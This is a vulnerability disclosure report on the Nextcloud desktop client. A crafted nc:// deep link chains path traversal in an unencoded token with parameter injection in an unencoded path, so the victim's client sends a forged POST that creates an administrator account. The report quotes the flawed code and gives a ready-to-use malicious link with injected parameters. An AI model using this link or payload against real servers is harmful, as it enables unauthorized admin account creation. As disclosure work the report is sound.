It is possible to make a user send any POST request with an arbitrary body if they click on a malicious deep link (e.g. in an email, a chat message, etc.).
This vulnerability was introduced in an attempt to fix #1720043. The patch, however, can be bypassed and also introduced a CSRF vulnerability.
The following reproduction steps send an OCS API request to the /ocs/v1.php/cloud/users endpoint with the following POST body:

path=/.\&userid=hacker&password=h4ck3rPassw0Rd!&displayName=hacker&[email protected]&groups[]=admin&\..\.owncloudsync.log

If the victim is not an administrator, one would need to target another controller. Clicking the following deep link triggers that request:

nc://open/[email protected]/.\&userid=hacker&password=h4ck3rPassw0Rd!&displayName=hacker&[email protected]&groups[]=admin&\..\.owncloudsync.log?token=../../../../../../../ocs/v1.php/cloud/users
The attempt to fix #1720043 was made in https://github.com/nextcloud/desktop/pull/5055 and introduced the following code:

// token comes straight from the deep link and is interpolated into the URL unencoded
const auto checkTokenForEditLocally = new SimpleApiJob(accountFound->account(), QStringLiteral("/ocs/v2.php/apps/files/api/v1/openlocaleditor/%1").arg(token));
checkTokenForEditLocally->setVerb(SimpleApiJob::Verb::Post);
// relPath also comes from the deep link and is appended to the form body unencoded
checkTokenForEditLocally->setBody(QByteArray{"path=/"}.append(relPath.toUtf8()));
There are two vulnerabilities here that can be chained together:
1. token is concatenated directly into the URL and not properly encoded. Passing a token such as ?token=../../../../../../../ocs/v1.php/cloud/users therefore makes the request go to /ocs/v2.php/apps/files/api/v1/openlocaleditor/../../../../../../../ocs/v1.php/cloud/users, which resolves to /ocs/v1.php/cloud/users.

2. relPath is concatenated directly into the POST body and not properly encoded. Passing a path such as .\&userid=hacker&password=h4ck3rPassw0Rd!&displayName=hacker&[email protected]&groups[]=admin&\..\.owncloudsync.log therefore creates several POST request parameters. (Note: ./owncloudsync.log is a default file which I use here to ensure the file-exists check earlier in the code passes.)

Please note that all bugs reported by Authentick GmbH will be publicly disclosed within 90 days of vendor notification. In extraordinary cases we may increase that upon request by the vendor.